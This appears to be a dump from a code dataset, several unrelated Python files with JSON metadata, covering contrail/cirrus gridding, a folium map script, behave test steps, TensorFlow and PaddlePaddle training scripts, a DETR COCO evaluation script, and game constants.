segment waypoints (head and tail).\n    weights : xr.DataArray\n        Pixel weights for `segment_grid`.\n        See `_pixel_weights` function.\n    dist_perpendicular : xr.DataArray\n        Perpendicular distance from contrail segment to each segment grid pixel, [:math:`m`]\n        See `_segment_perpendicular_distance_to_pixels` function.\n\n    Returns\n    -------\n    xr.DataArray\n        Relative Gaussian plume concentration along the contrail width\n\n    Notes\n    -----\n    - Assume a one-dimensional Gaussian plume.\n    - See Appendix A11 of :cite:`schumannContrailCirrusPrediction2012`.\n    \"\"\"\n    head = contrail_segment.dataframe.iloc[0]\n    tail = contrail_segment.dataframe.iloc[1]\n\n    width = weights.values * tail[\"width\"] + (1 - weights.values) * head[\"width\"]\n    sigma_yy = 0.125 * width**2\n\n    concentration = np.where(\n        (weights.values < 0) | (weights.values > 1),\n        0,\n        (4 / np.pi) ** 0.5 * np.exp(-0.5 * dist_perpendicular.values**2 / sigma_yy),\n    )\n    return xr.DataArray(concentration, coords=weights.coords)\n\n\ndef _add_segment_to_main_grid(main_grid: xr.DataArray, segment_grid: xr.DataArray) -> xr.DataArray:\n    \"\"\"\n    Add the gridded contrail segment to the main grid.\n\n    Parameters\n    ----------\n    main_grid : xr.DataArray\n        Aggregated contrail segment properties in a longitude-latitude grid.\n    segment_grid : xr.DataArray\n        Contrail segment dimension and property projected to a longitude-latitude grid.\n\n    Returns\n    -------\n    xr.DataArray\n        Aggregated contrail segment properties, including `segment_grid`.\n\n    Notes\n    -----\n    - The spatial domain of `segment_grid` covers only the contrail segment, while\n      `main_grid` is expected to span a larger spatial domain.\n    - Accumulating each small `segment_grid` into `main_grid` keeps the memory and\n      compute requirements manageable.\n    \"\"\"\n    lon_main = main_grid[\"longitude\"].values\n    lat_main = main_grid[\"latitude\"].values\n\n    lon_segment_grid = np.round(segment_grid[\"longitude\"].values, decimals=2)\n    lat_segment_grid = np.round(segment_grid[\"latitude\"].values, decimals=2)\n\n    main_grid_arr = main_grid.values\n    subgrid_arr = segment_grid.values\n\n    try:\n        ix_ = np.searchsorted(lon_main, lon_segment_grid[0])\n        ix = np.searchsorted(lon_main, lon_segment_grid[-1]) + 1\n        iy_ = np.searchsorted(lat_main, 
lat_segment_grid[0])\n iy = np.searchsorted(lat_main, lat_segment_grid[-1]) + 1\n except IndexError:\n warnings.warn(\n \"Contrail segment ignored as it is outside spatial bounding box of the main grid. \"\n )\n else:\n main_grid_arr[ix_:ix, iy_:iy] = main_grid_arr[ix_:ix, iy_:iy] + subgrid_arr\n\n return xr.DataArray(main_grid_arr, coords=main_grid.coords)\n\n\n# ------------------------------------\n# High resolution grid: natural cirrus\n# ------------------------------------\n\n\ndef natural_cirrus_properties_to_hi_res_grid(\n met: MetDataset,\n *,\n spatial_grid_res: float = 0.05,\n optical_depth_threshold: float = 0.1,\n random_state: np.random.Generator | int | None = None,\n) -> MetDataset:\n r\"\"\"\n Increase the longitude-latitude resolution of natural cirrus cover and optical depth.\n\n Parameters\n ----------\n met : MetDataset\n Pressure level dataset for one time step containing 'air_temperature', 'specific_humidity',\n 'specific_cloud_ice_water_content', 'geopotential',and `fraction_of_cloud_cover`\n spatial_grid_res : float\n Spatial grid resolution for the output, [:math:`\\deg`]\n optical_depth_threshold : float\n Sensitivity of cirrus detection, set at 0.1 to match the capability of satellites.\n random_state : np.random.Generator | int | None\n A number used to initialize a pseudorandom number generator.\n\n Returns\n -------\n MetDataset\n Single-level dataset containing the high resolution natural cirrus properties.\n\n References\n ----------\n - :cite:`schumannContrailCirrusPrediction2012`\n\n Notes\n -----\n - The high-resolution natural cirrus coverage and optical depth is distributed randomly,\n ensuring that the mean value is equal to the value of the original grid.\n - Enhancing the spatial resolution is necessary because the existing spatial resolution of\n numerical weather prediction (NWP) models are too coarse to resolve the coverage area of\n relatively narrow contrails.\n \"\"\"\n # Ensure the required columns are included in `met`\n met.ensure_vars(\n (\n \"air_temperature\",\n \"specific_humidity\",\n \"specific_cloud_ice_water_content\",\n \"geopotential\",\n \"fraction_of_cloud_cover\",\n )\n )\n\n # Ensure `met` only contains one time step, constraint can be relaxed in the future.\n if len(met[\"time\"].data) > 1:\n raise AssertionError(\n \"`met` contains more than one time step, but function only accepts one time step. 
\"\n )\n\n # Calculate tau_cirrus as observed by satellites\n met[\"tau_cirrus\"] = tau_cirrus(met)\n tau_cirrus_max = met[\"tau_cirrus\"].data.sel(level=met[\"level\"].data[-1])\n\n # Calculate cirrus coverage as observed by satellites, cc_max(x,y,t) = max[cc(x,y,z,t)]\n cirrus_cover_max = met[\"fraction_of_cloud_cover\"].data.max(dim=\"level\")\n\n # Increase resolution of longitude and latitude dimensions\n lon_coords_hi_res, lat_coords_hi_res = _hi_res_grid_coordinates(\n met[\"longitude\"].values, met[\"latitude\"].values, spatial_grid_res=spatial_grid_res\n )\n\n # Increase spatial resolution by repeating existing values (temporarily)\n n_reps = int(\n np.round(np.diff(met[\"longitude\"].values)[0], decimals=2)\n / np.round(np.diff(lon_coords_hi_res)[0], decimals=2)\n )\n cc_rep = _repeat_rows_and_columns(cirrus_cover_max.values, n_reps=n_reps)\n tau_cirrus_rep = _repeat_rows_and_columns(tau_cirrus_max.values, n_reps=n_reps)\n\n # Enhance resolution of `tau_cirrus`\n rng = np.random.default_rng(random_state)\n rand_number = rng.uniform(0, 1, np.shape(tau_cirrus_rep))\n dx = 0.03 # Prevent division of small values: calibrated to match the original cirrus cover\n has_cirrus = rand_number > (1 + dx - cc_rep)\n\n tau_cirrus_hi_res = np.zeros_like(tau_cirrus_rep)\n tau_cirrus_hi_res[has_cirrus] = tau_cirrus_rep[has_cirrus] / cc_rep[has_cirrus]\n\n # Enhance resolution of `cirrus coverage`\n cirrus_cover_hi_res = np.where(tau_cirrus_hi_res > optical_depth_threshold, 1, 0)\n\n # Package outputs\n ds_hi_res = xr.Dataset(\n data_vars=dict(\n tau_cirrus=([\"longitude\", \"latitude\"], tau_cirrus_hi_res),\n cc_natural_cirrus=([\"longitude\", \"latitude\"], cirrus_cover_hi_res),\n ),\n coords=dict(longitude=lon_coords_hi_res, latitude=lat_coords_hi_res),\n )\n ds_hi_res = ds_hi_res.expand_dims({\"level\": np.array([-1])})\n ds_hi_res = ds_hi_res.expand_dims({\"time\": met[\"time\"].values})\n return MetDataset(ds_hi_res)\n\n\ndef _hi_res_grid_coordinates(\n lon_coords: npt.NDArray[np.float_],\n lat_coords: npt.NDArray[np.float_],\n *,\n spatial_grid_res: float = 0.05,\n) -> tuple[npt.NDArray[np.float_], npt.NDArray[np.float_]]:\n r\"\"\"\n Calculate longitude and latitude coordinates for the high resolution grid.\n\n Parameters\n ----------\n lon_coords : npt.NDArray[np.float_]\n Longitude coordinates provided by the original `MetDataset`.\n lat_coords : npt.NDArray[np.float_]\n Latitude coordinates provided by the original `MetDataset`.\n spatial_grid_res : float\n Spatial grid resolution for the output, [:math:`\\deg`]\n\n Returns\n -------\n tuple[npt.NDArray[np.float_], npt.NDArray[np.float_]\n Longitude and latitude coordinates for the high resolution grid.\n \"\"\"\n d_lon = np.abs(np.diff(lon_coords)[0])\n d_lat = np.abs(np.diff(lat_coords)[0])\n is_whole_number = (d_lon / spatial_grid_res) - int(d_lon / spatial_grid_res) == 0\n\n if (d_lon <= spatial_grid_res) | (d_lat <= spatial_grid_res):\n raise ArithmeticError(\n \"Spatial resolution of `met` is already higher than `spatial_grid_res`\"\n )\n\n if not is_whole_number:\n raise ArithmeticError(\n \"Select a spatial grid resolution where `spatial_grid_res / existing_grid_res` is \"\n \"a whole number. 
\"\n )\n\n lon_coords_hi_res = np.arange(\n lon_coords[0], lon_coords[-1] + spatial_grid_res, spatial_grid_res\n )\n\n lat_coords_hi_res = np.arange(\n lat_coords[0], lat_coords[-1] + spatial_grid_res, spatial_grid_res\n )\n\n return (np.round(lon_coords_hi_res, decimals=3), np.round(lat_coords_hi_res, decimals=3))\n\n\ndef _repeat_rows_and_columns(\n array_2d: npt.NDArray[np.float_], *, n_reps: int\n) -> npt.NDArray[np.float_]:\n \"\"\"\n Repeat the elements in `array_2d` along each row and column.\n\n Parameters\n ----------\n array_2d : npt.NDArray[np.float_, np.float_]\n 2D array containing `tau_cirrus` or `cirrus_coverage` across longitude and latitude.\n n_reps : int\n Number of repetitions.\n\n Returns\n -------\n npt.NDArray[np.float_, np.float_]\n 2D array containing `tau_cirrus` or `cirrus_coverage` at a higher spatial resolution.\n See :func:`_hi_res_grid_coordinates`.\n \"\"\"\n dimension = np.shape(array_2d)\n\n # Repeating elements along axis=1\n array_1d_rep = [np.repeat(array_2d[i, :], n_reps) for i in np.arange(dimension[0])]\n stacked = np.vstack(array_1d_rep)\n\n # Repeating elements along axis=0\n array_2d_rep = np.repeat(stacked, n_reps, axis=0)\n\n # Do not repeat final row and column as they are on the edge\n return array_2d_rep[: -(n_reps - 1), : -(n_reps - 1)]\n","repo_name":"contrailcirrus/pycontrails","sub_path":"pycontrails/models/cocip/output_formats.py","file_name":"output_formats.py","file_ext":"py","file_size_in_byte":76989,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"50"} +{"seq_id":"29690467304","text":"import folium\r\nimport pandas\r\n\r\ndata = pandas.read_excel(\"parquesyjardines1.xlsx\", sheet_name = 0)\r\nlat = list(data[\"Lat\"])\r\nlon = list(data[\"Lon\"])\r\ndir = list(data[\"Dirección\"])\r\npla = list(data[\"Plaza\"])\r\nsup = list(data[\"Superficie\"])\r\n\r\ndata = pandas.read_csv(\"volcanoes.txt\")\r\nlat1 = list(data[\"LAT\"])\r\nlon1 = list(data[\"LON\"])\r\nelev = list(data[\"ELEV\"])\r\n\r\nhtml1 = \"\"\"

<h4>Volcano information:</h4>
    \r\nHeight: %s m\r\n\"\"\"\r\n\r\ndef color_producer(superficie):\r\n if superficie < 960:\r\n return 'green'\r\n elif 960 <= superficie < 3350:\r\n return 'orange'\r\n else:\r\n return 'red'\r\n\r\n\r\nmap = folium.Map(location = [29, -111.30], zoom_start=10, tiles=\"Stamen Terrain\")\r\n\r\nfgvol = folium.FeatureGroup(name=\"Volcanoes\")\r\n\r\nfor lt1, ln1, el in zip (lat1, lon1, elev):\r\n iframe = folium.IFrame(html=html1 % str(el), width=200, height=100)\r\n fgvol.add_child(folium.CircleMarker(location=[lt1,ln1], fill=True, fill_color=color_producer(el), color=color_producer(el), radius=8,\r\n popup=folium.Popup(iframe)))\r\n\r\nfgp = folium.FeatureGroup(name=\"Parques\")\r\n\r\nfor lt, ln, dr, pl, sp in zip(lat, lon, dir, pla, sup):\r\n fgp.add_child(folium.CircleMarker(location=[lt, ln], fill=True, fill_color=color_producer(sp), color=color_producer(sp), radius=8,\r\n popup=\"Plaza: \" + str(pl) + \"\\nDirección: \" + str(dr) + \"\\nSuperficie: \" + str(sp) + \" m²\"))\r\n\r\nfgv = folium.FeatureGroup(name=\"Population\")\r\n\r\n\r\nfgv.add_child(folium.GeoJson(data=open(file='world.json', mode='r', encoding='utf-8-sig').read(),\r\nstyle_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000\r\nelse 'orange' if 10000000 <= x ['properties']['POP2005'] < 20000000 else 'red'}))\r\n\r\n\r\nmap.add_child(fgv)\r\nmap.add_child(fgp)\r\nmap.add_child(fgvol)\r\n\r\nmap.add_child(folium.LayerControl())\r\n\r\nmap.save(\"Map1.html\")\r\n","repo_name":"IssamJim/Practica-Mapa","sub_path":"map1.py","file_name":"map1.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"71120227357","text":"from behave import *\nfrom calculadora import Calculadora\n\n@given('a {values} to factorial')\ndef step_imp(context, values):\n context.calculadora = Calculadora()\n context.value = [int(x) for x in values.split(\",\")]\n\n@when('the calc factorial the values')\ndef step_imp(context):\n context.total = context.calculadora.factorial(context.value[0])\n\n@then('the {total} of factorial is ok')\ndef step_imp(context, total):\n if total== 'None':\n assert(context.total == 'None')\n else:\n assert(context.total == int(total))","repo_name":"EstebanOG/Ejercicio-Pruebas-de-aceptacion","sub_path":"Calculadora BSD/features/steps/factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"17967132574","text":"import numpy, sys\nimport tensorflow as tf\nfrom tensorflow.contrib import rnn\nimport preprocess_data\nimport numpy\nfrom lib import shuffle, split_dataset\n\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 2:\n print(\"Usage: train.py DATA_FILE\")\n sys.exit(-1)\n\n max_length = 500\n num_hidden = 512\n batch_size = 64\n\n\n print(\"Loading data...\")\n\n data = numpy.load(sys.argv[1]) #load training data from file\n\n train_x_valid = data[\"x_valid\"]\n train_x_not_valid = data[\"x_not_valid\"]\n train_y_valid = data[\"y_valid\"]\n train_y_not_valid = data[\"y_not_valid\"]\n max_length = data[\"max_length\"][0]\n\n print(train_x_valid)\n\n #split data, make sure test data contains all types of samples (valid and not valid ones)\n train_x_valid, test_x_valid, train_y_valid, test_y_valid = split_dataset(train_x_valid, train_y_valid, 5)\n train_x_not_valid, test_x_not_valid, train_y_not_valid, test_y_not_valid = split_dataset(train_x_not_valid, 
train_y_not_valid, 5)\n\n train_x = numpy.concatenate((train_x_valid, train_x_not_valid))\n train_y = numpy.concatenate((train_y_valid, train_y_not_valid))\n test_x = numpy.concatenate((test_x_valid, test_x_not_valid))\n test_y = numpy.concatenate((test_y_valid, test_y_not_valid))\n\n\n train_x, train_y = shuffle(train_x, train_y)\n test_x, test_y = shuffle(test_x, test_y)\n\n #convert y to one-hot encoding\n train_y = tf.one_hot(train_y, 2)\n test_y = tf.one_hot(test_y, 2)\n\n train_x = train_x.astype(\"float32\")\n test_x = test_x.astype(\"float32\")\n\n train_x /= 255\n test_x /= 255\n\n train_x = numpy.expand_dims(train_x, axis=2)\n test_x = numpy.expand_dims(test_x, axis=2)\n\n #dataset = tf.data.Dataset.from_tensor_slices((train_x, train_y)) #create dataset from training data\n\n print(\"Setting up network...\")\n\n #input and output layers\n x = tf.placeholder(tf.float32, [None, max_length, 1])\n y = tf.placeholder(tf.float32, [None, 2])\n\n #lstm layer\n #cell = tf.nn.rnn_cell.LSTMCell(num_hidden, state_is_tuple=True)\n cell = rnn.MultiRNNCell([rnn.BasicLSTMCell(num_hidden), rnn.BasicLSTMCell(num_hidden)])\n val, state = tf.nn.dynamic_rnn(cell, x, dtype=tf.float32)\n\n val = tf.transpose(val, [1, 0, 2])\n last = tf.gather(val, int(val.get_shape()[0]) - 1)\n\n weight = tf.Variable(tf.truncated_normal([num_hidden, int(y.get_shape()[1])]))\n bias = tf.Variable(tf.constant(0.1, shape=[y.get_shape()[1]]))\n\n prediction = tf.nn.softmax(tf.matmul(last, weight) + bias)\n cross_entropy = -tf.reduce_sum(y * tf.log(tf.clip_by_value(prediction, 1e-10, 1.0)))\n\n #prediction = tf.matmul(last, weight) + bias\n #cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))\n\n optimizer = tf.train.RMSPropOptimizer(0.1)\n minimize = optimizer.minimize(cross_entropy)\n\n mistakes = tf.not_equal(tf.argmax(y, 1), tf.argmax(prediction, 1))\n error = tf.reduce_mean(tf.cast(mistakes, tf.float32))\n\n print(\"Initialising variables...\")\n\n init_op = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init_op)\n\n print(\"Starting training...\")\n\n test_y = sess.run(test_y) #converting tensor to numpy array\n train_y = sess.run(train_y)\n\n no_of_batches = int(len(train_x) / batch_size)\n epoch = 25\n for i in range(epoch):\n print(\"Training epoch \" + str(i))\n ptr = 0\n for j in range(no_of_batches):\n print(\"Training batch \" + str(j) + \" of \" + str(no_of_batches))\n inp, out = train_x[ptr:ptr + batch_size], train_y[ptr:ptr + batch_size]\n ptr += batch_size\n sess.run(minimize, feed_dict={x: inp, y: out})\n print(\"Evaluating...\")\n incorrect = sess.run(error, feed_dict={x: test_x, y: test_y})\n print('Epoch {:2d} error {:3.4f}%'.format(i + 1, 100 * incorrect))\n sess.close()\n","repo_name":"sagr4019/ResearchProject","sub_path":"neural-networks-experiments/static-analyzer-toy-language/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"73642788316","text":"import argparse\nimport json\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval\nimport tensorflow as tf\nfrom tqdm import tqdm\n\nfrom detr_tensorflow.datasets import COCODatasetBBoxes\nfrom detr_tensorflow import models\nfrom detr_tensorflow.utils import (preprocess_image, read_jpeg_image,\n absolute2relative, xyxy2xywh)\n\n\nparser = argparse.ArgumentParser(\n 'DETR evalutaion script for the COCO 
dataset.')\n\nparser.add_argument('--coco_path', type=str,\n help='Path to the COCO dataset root directory. '\n 'For evaluation, only the '\n 'validation data needs to be downloaded.')\nparser.add_argument('--backbone', type=str, default=None,\n choices=('resnet50', 'resnet50-dc5',\n 'resnet101', 'resnet101-dc5'),\n help='Choice of backbone CNN for the model.')\nparser.add_argument('--frozen_weights', type=str, default=None,\n help='Path to the pretrained weights file. '\n 'Please check the repository for links to download '\n 'tensorflow ports of the official ones.')\nparser.add_argument('--batch_size', type=int, default=2)\nparser.add_argument('--results_file', type=str, default='results.json',\n help='.json file to save the results in the COCO format.')\nparser.add_argument('--from_file', action='store_true',\n help='If specified, will compute the results using '\n 'the predictions in the --results_file, instead of '\n 'performing inference on the whole validation set again.')\n\nargs = parser.parse_args()\n\n\ncoco_data = COCODatasetBBoxes(\n args.coco_path, partition='val2017', return_boxes=False)\n\n\ndef evaluate(results):\n coco_dt = COCO.loadRes(coco_data.coco, args.results_file)\n cocoEval = COCOeval(coco_data.coco, coco_dt, iouType='bbox')\n cocoEval.evaluate()\n cocoEval.accumulate()\n cocoEval.summarize()\n\n\nif args.from_file:\n evaluate(args.results_file)\n exit()\n\nif args.backbone is None or args.frozen_weights is None:\n raise Exception('If --from_file is not provided, '\n 'both --backbone and --frozen_weights '\n 'must be provided.')\n\nmodel_fns = {\n 'resnet50': models.default.build_detr_resnet50,\n 'resnet50-dc5': models.default.build_detr_resnet50_dc5,\n 'resnet101': models.default.build_detr_resnet101,\n 'resnet101-dc5': models.default.build_detr_resnet101_dc5\n}\n\ndetr = model_fns[args.backbone](num_classes=91)\ndetr.build()\ndetr.load_weights(args.frozen_weights)\n\n\ndataset = tf.data.Dataset.from_generator(\n lambda: coco_data, (tf.int32, tf.string))\ndataset = dataset.map(\n lambda img_id, img_path: (img_id, read_jpeg_image(img_path)))\ndataset = dataset.map(\n lambda img_id, image: (img_id, *preprocess_image(image)))\n\ndataset = dataset.padded_batch(\n batch_size=args.batch_size,\n padded_shapes=((), (None, None, 3), (None, None)),\n padding_values=(None, tf.constant(0.0), tf.constant(True)))\n\nresults = []\n\nwith tqdm(total=len(coco_data)) as pbar:\n for img_ids, images, masks in dataset:\n outputs = detr((images, masks), post_process=True)\n\n for img_id, scores, labels, boxes in zip(\n img_ids, outputs['scores'],\n outputs['labels'], outputs['boxes']):\n img_id = img_id.numpy()\n\n img_info = coco_data.coco.loadImgs([img_id])[0]\n img_height = img_info['height']\n img_width = img_info['width']\n\n for score, label, box in zip(scores, labels, boxes):\n score = score.numpy()\n label = label.numpy()\n box = absolute2relative(box, (img_width, img_height))\n box = xyxy2xywh(box).numpy()\n\n results.append({\n \"image_id\": int(img_id),\n \"category_id\": int(label),\n \"bbox\": box.tolist(),\n \"score\": float(score)\n })\n\n pbar.update(int(len(images)))\n\njson_object = json.dumps(results, indent=2)\nwith open(args.results_file, 'w') as f:\n f.write(json_object)\n\nevaluate(args.results_file)\n","repo_name":"Leonardo-Blanger/detr_tensorflow","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"50"} 
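# --- Illustrative sketch (added by the editor, not part of any record above) ---
# The eval.py record above converts DETR's absolute corner boxes into the
# relative [x, y, width, height] form written to its COCO results file via
# absolute2relative and xyxy2xywh. The two helpers below are re-derived from
# that usage, not copied from detr_tensorflow.utils, so their exact semantics
# are an assumption.
import numpy as np

def xyxy2xywh(box):
    # COCO-style box: [x_min, y_min, width, height]
    x0, y0, x1, y1 = box
    return np.array([x0, y0, x1 - x0, y1 - y0])

def absolute2relative(box, size):
    # Divide pixel coordinates by (image_width, image_height)
    w, h = size
    return np.asarray(box, dtype=float) / np.array([w, h, w, h])

rel = absolute2relative([10, 20, 110, 70], (200, 100))
print(xyxy2xywh(rel))  # [0.05 0.2  0.5  0.5 ]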
+{"seq_id":"18556664979","text":"import os\r\nimport sys\r\nimport argparse\r\nimport inspect\r\nimport datetime\r\nimport json\r\nimport numpy as np\r\n\r\nimport time\r\n\r\nimport paddle\r\nimport paddle.fluid as fluid\r\nimport paddle.fluid.optimizer as optimizer\r\n\r\n\r\n#import models\r\nimport hmdb_2d_resnets\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-mode', type=str, help='rgb or flow')\r\nparser.add_argument('-exp_name', type=str)\r\nparser.add_argument('-video_dir', type=str, default='data/')\r\nparser.add_argument('-file_dir', type=str, default='data/hmdb/')\r\nparser.add_argument('-batch_size', type=int, default=24)\r\nparser.add_argument('-length', type=int, default=16)\r\nparser.add_argument('-learnable', type=str, default='[0,0,0,0,0]')\r\nparser.add_argument('-niter', type=int)\r\nparser.add_argument('-system', type=str)\r\nparser.add_argument('-model', type=str)\r\nparser.add_argument('-check_point', type=str)\r\nparser.add_argument('-learning_rate', type = float, default = 0.01)\r\nparser.add_argument('-momentum', type = float, default = 0.9)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\n##################\r\n#\r\n# Create model, dataset, and training setup\r\n#\r\n##################\r\n\r\ndata_path = args.video_dir ## path for train/test data.\r\nfile_path = args.video_dir ## path for train/test description file.\r\n\r\nbatch_size = args.batch_size\r\n\r\nplace = fluid.CUDAPlace(0)\r\nwith fluid.dygraph.guard(place):\r\n\r\n def batch_generator_creator(dataset):\r\n dataset.shuffdata()\r\n def _batch_reader():\r\n for i in range(len(dataset)):\r\n data = dataset[i]\r\n if(data[0].shape[3] == 112):\r\n yield data\r\n\r\n return (_batch_reader)\r\n \r\n if args.system == 'hmdb':\r\n from hmdb_lintel import HMDB as DS\r\n dataseta = DS(file_path, data_path, model=args.model, mode=args.mode, length=args.length)\r\n train_reader = paddle.batch(batch_generator_creator(dataseta),\r\n batch_size=batch_size,\r\n drop_last=False)\r\n \r\n dataset = DS(file_path, data_path, model=args.model, mode=args.mode, length=args.length, c2i=dataseta.class_to_id)\r\n eval_reader = paddle.batch(batch_generator_creator(dataset),\r\n batch_size=batch_size,\r\n drop_last=False)\r\n\r\n\r\n repmodel = hmdb_2d_resnets.resnet50(pretrained=False, mode='rgb') \r\n\r\n lr = args.learning_rate\r\n momentum = args.momentum\r\n lrdecay = fluid.dygraph.InverseTimeDecay(\r\n learning_rate=lr,\r\n decay_steps=3000,\r\n decay_rate=0.5)\r\n \r\n opt = optimizer.MomentumOptimizer(parameter_list=repmodel.parameters(), \r\n learning_rate=lr,\r\n momentum=momentum) \r\n\r\n\r\n#################\r\n#\r\n# Setup logs, store model code\r\n# hyper-parameters, etc...\r\n#\r\n#################\r\n log_name = datetime.datetime.today().strftime('%m-%d-%H%M%S')+'-'+args.exp_name\r\n log_path = os.path.join('logs/',log_name)\r\n os.mkdir(log_path)\r\n os.system('cp * logs/'+log_name+'/')\r\n\r\n# deal with hyper-params...\r\n with open(os.path.join(log_path,'params.json'), 'w') as out:\r\n hyper = vars(args)\r\n json.dump(hyper, out)\r\n log = {'epoch acc':[], 'epoch loss':[], 'val loss':[], 'val acc':[]}\r\n \r\n\r\n###############\r\n#\r\n# Train the model and save everything\r\n#\r\n###############\r\n num_epochs = 20\r\n c = 0\r\n #\r\n \r\n\r\n if(args.check_point):\r\n check_point = os.path.join('logs/',args.check_point)\r\n premodel, _ = fluid.dygraph.load_dygraph(os.path.join(check_point,'Myrepflow'))\r\n repmodel.set_dict(premodel)\r\n\r\n for epoch in range(num_epochs):\r\n phase = 
'train'\r\n if phase=='train':\r\n repmodel.train()\r\n tloss = 0.\r\n acc = 0.\r\n tot = 0\r\n step = 0\r\n tacc = 0\r\n e=s=0\r\n for batch_id,data in enumerate(train_reader()): #for vid, cls in dataloader[phase]:\r\n #vid = np.array([data[0]], np.float32)\r\n vid = np.array([x[0] for x in data], np.float32)\r\n cls = np.array([x[1] for x in data]).astype('int64')\r\n cls = cls[:, np.newaxis]\r\n vid = fluid.dygraph.to_variable(vid)\r\n cls = fluid.dygraph.to_variable(cls)\r\n cls.stop_gradient = True\r\n \r\n outputs = repmodel(vid)\r\n \r\n loss = fluid.layers.cross_entropy(outputs, cls)\r\n avg_loss = fluid.layers.mean(loss)\r\n acc=fluid.layers.accuracy(outputs,cls, k=1) \r\n\r\n tacc += acc.numpy()\r\n tloss += avg_loss.numpy() #.item()\r\n avg_loss.backward()\r\n for name, parms in repmodel.named_parameters():\r\n if(name == 'repofrepflow.rep_flow.t_linear.weight'):\r\n print(name, parms.numpy())\r\n \r\n opt.minimize(avg_loss)\r\n repmodel.clear_gradients()\r\n c += 1\r\n step += 1\r\n print('epoch',epoch,'step',step,'train loss',avg_loss.numpy(), 'acc', acc.numpy())\r\n \r\n log['epoch loss'].append((tloss/(step+1e-12)).tolist())\r\n log['epoch acc'].append((tacc/(step+1e-12)).tolist())\r\n\r\n param_path = os.path.join(log_path, str(epoch))\r\n fluid.dygraph.save_dygraph(repmodel.state_dict(),os.path.join(param_path,'Myrepflow')) #save model\r\n \r\n with open(os.path.join(log_path,'log.json'), 'w') as out:\r\n json.dump(log, out)\r\n print('epoch',epoch,'epoch train loss',tloss/(step + 1e-12), 'epoch acc', tacc/(step + 1e-12))\r\n\r\n with open(os.path.join(log_path,'log.json'), 'w') as out:\r\n json.dump(log, out)\r\n \r\n","repo_name":"PaddlePaddle/Contrib","sub_path":"representation-flow/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6069,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"50"} +{"seq_id":"20511829532","text":"\"\"\"\nName: constants.py\nAuthor: Hugh McCutcheon\nDescription: A file containing all of the constant variables used by my code\n\"\"\"\nimport arcade\n\nTILE_SPRITE_SCALING = 1\nPLAYER_SCALING = 1\n\nSCREEN_WIDTH = int(arcade.window_commands.get_display_size()[0]/1)\nSCREEN_HEIGHT = int(arcade.window_commands.get_display_size()[1]/1)\nSCREEN_TITLE = \"Kinarough\"\nSPRITE_PIXEL_SIZE = 128\nGRID_PIXEL_SIZE = (SPRITE_PIXEL_SIZE * TILE_SPRITE_SCALING)\nSCALING = 1\n\n# Physics\nJUMP_SPEED = 20\nGRAVITY = 0.75\nMAX_SPEED = 1000000000000\nACCELERATION_RATE = 0.5\nHORIZONTAL_DAMPING = 0.17\nHORIZONTAL_DAMPING_STOPPING = 0.4\nCUT_JUMP_HEIGHT = 0.5\nFRICTION = 0.0\n\nBULLET_SPEED = 50\n\nUPDATES_PER_FRAME = 5\nMOVEMENT_SPEED = 7\n\nSPRITE_SCALING_LASER = 1\n\nZOOM_AMMOUNT = 400\n","repo_name":"Hugh-McCutcheon/Game-Design","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22332254867","text":"import json\nfrom itertools import product, groupby\nfrom pathlib import Path\nfrom typing import List\n\nimport numpy as np\nimport pandas as pd\n\nimport hydra\n\nfrom evaluation.experiment_version import ExperimentVersion\n\n\nclass DsTaskTable:\n def __init__(self, config):\n # base path is the path to the first experiment cycle\n self.base_path = Path(config.base_path)\n self.versions = self._init_versions(config)\n self.grouped_versions = self._group_versions(\"seed\")\n self.split_param = config.split_param if \"split_param\" in config 
else None\n self.ds_tasks = config.ds_tasks\n\n def _init_versions(self, config):\n versions = []\n for experiment in config.experiments:\n filtered_config = [\n [(key, v) for v in values]\n for key, values in experiment.iter_params.items()\n ]\n for params in product(*filtered_config):\n version_params = {i[0]: i[1] for i in params}\n exp_config = dict(experiment)\n exp_config.pop(\"iter_params\")\n version_params.update(exp_config)\n version_params[\"base_path\"] = self.base_path\n version_params.update(\n dict(experiment.prediction_models[version_params[\"pred_model\"]])\n )\n exp_version = ExperimentVersion(**version_params)\n versions.append(exp_version)\n return versions\n\n def _key_func(self, version, version_param):\n naming_scheme_group = version.naming_scheme_version.replace(\n f\"{version_param}{{{version_param}}}\", \"\"\n )\n naming_scheme_resolved = naming_scheme_group.format(**version.version_params)\n return version.pred_model, naming_scheme_resolved\n\n def _group_versions(self, version_param):\n # version should be grouped if all version params except for version_param are the same\n grouped_objects = []\n for _, group in groupby(\n self.versions, key=lambda x: self._key_func(x, version_param)\n ):\n group_list = list(group)\n grouped_objects.append(group_list)\n return grouped_objects\n\n def get_base_df(self, grouped_versions):\n pred_models = []\n unc_types = []\n aggregations = []\n for group in grouped_versions:\n model_repeat = len(group[0].unc_types) * len(group[0].aggregations)\n pred_models.extend([group[0].pred_model] * model_repeat)\n for unc_type in group[0].unc_types:\n unc_types.extend([unc_type] * len(group[0].aggregations))\n aggregations.extend(list(group[0].aggregations) * len(group[0].unc_types))\n base_df_dict = {\n (\"\", \"pred_model\"): pred_models,\n (\"\", \"unc_type\"): unc_types,\n (\"\", \"aggregation\"): aggregations,\n }\n\n for ds_task, metrics in self.ds_tasks.items():\n for metric_name, metric_probs in metrics.items():\n if 